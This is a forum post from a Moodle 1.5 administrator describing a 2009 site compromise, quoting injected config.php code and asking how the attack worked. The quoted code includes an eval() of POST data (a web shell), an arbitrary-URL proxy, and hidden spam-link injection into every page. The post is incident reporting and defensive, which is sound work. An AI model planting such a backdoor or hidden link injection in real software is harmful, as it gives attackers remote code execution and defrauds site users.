Hello,
we are using a fairly old version of Moodle (Moodle 1.5.2 + (2005060222)) and experienced an attack on 1/27 2009. The attacker modified at least two source files and created one file:
1) config.php (altered on 1/27/2009)
$links = '
xepxep
<a href=http://aims2.ideal.asu.edu/?search=viagra>viagra</a>
<a href=http://aims2.ideal.asu.edu/?search=buying+viagra>buying viagra</a> [...]';
This string contains about 600 further lines of links.
Also there was a function included, which probably places those links on every requested page:
function output_callback($str)
{
GLOBAL $links;
preg_match("|<body[^>]*>|",$str,$arr);
return str_replace($arr[0],$arr[0].'<i style="display:none">'.$links.'</i>',$str);
}
function get_page($url)
{
return file_get_contents($url);
}
if(isset($_POST['code']) && $_POST['code'])
{
eval(stripslashes($_POST[code]));
exit;
}
if(isset($_GET['proxy']) && $_GET['proxy'])
{
print get_page($_GET['proxy']);
exit;
}
ob_start ('output_callback');
2) A file was created 1/27/2009 in root: in.php, which was empty
3) index.php (root) was altered on 2/2/2009
The following lines where included:
<?php
?>
<!-- tdooqzinaakluixwons -->
<u style="display:none;\">"hackcheckstr"</u>
<!-- tdooqzinaakluixwons -->
--------
<?php
print_footer('home'); // Please do not modify this line
?>
I assume that this is somehow a Moodle vulnerability, because if you enter "hackcheckstr" in google you will get whole bunch of Moodle pages, which all seem to be affected.
My actions:
1) replaced all source files with a non-infected backup copy
2) changed all passwords (moodle-admin, ftp, mysql, ssh)
3) chmod 440 config.php and index.php (all other files are 755)
My questions:
1) Is this a known issue and how can it be resolved?
2) Does anybody know how this attack is conducted?
3) Was there probably more damage? (other source files, data folder, DB corruption)?
4) Do you think my actions will prevent me from further hacks of the same type?
Thanks a lot!
Christian